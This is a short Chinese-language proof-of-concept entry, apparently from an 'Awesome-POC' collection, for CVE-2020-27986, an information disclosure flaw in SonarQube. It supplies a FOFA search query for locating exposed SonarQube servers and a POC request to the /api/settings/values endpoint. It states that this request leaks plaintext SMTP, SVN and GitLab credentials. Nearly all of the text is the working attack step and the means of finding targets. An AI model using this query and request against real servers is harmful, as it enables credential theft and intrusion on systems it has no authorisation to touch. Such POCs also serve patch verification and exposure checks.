Awesome-POC/Web应用漏洞/SonarQube values 信息泄露漏洞 CVE-2020-27986.md

# SonarQube values 信息泄露漏洞 CVE-2020-27986

## 漏洞描述

SonarQube 某接口存在信息泄露漏洞，可以获取部分敏感信息

## 漏洞影响

```
SonarQube
```

## FOFA

```
app="sonarQube-代码管理"
```

## 漏洞复现

主页如下

![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101933673.png)



漏洞POC



```plain
http://xxx.xxx.xxx.xxx/api/settings/values
```



![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101933276.png)



可泄露的为：明文SMTP、SVN和Gitlab等敏感信息



![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101934123.png)



##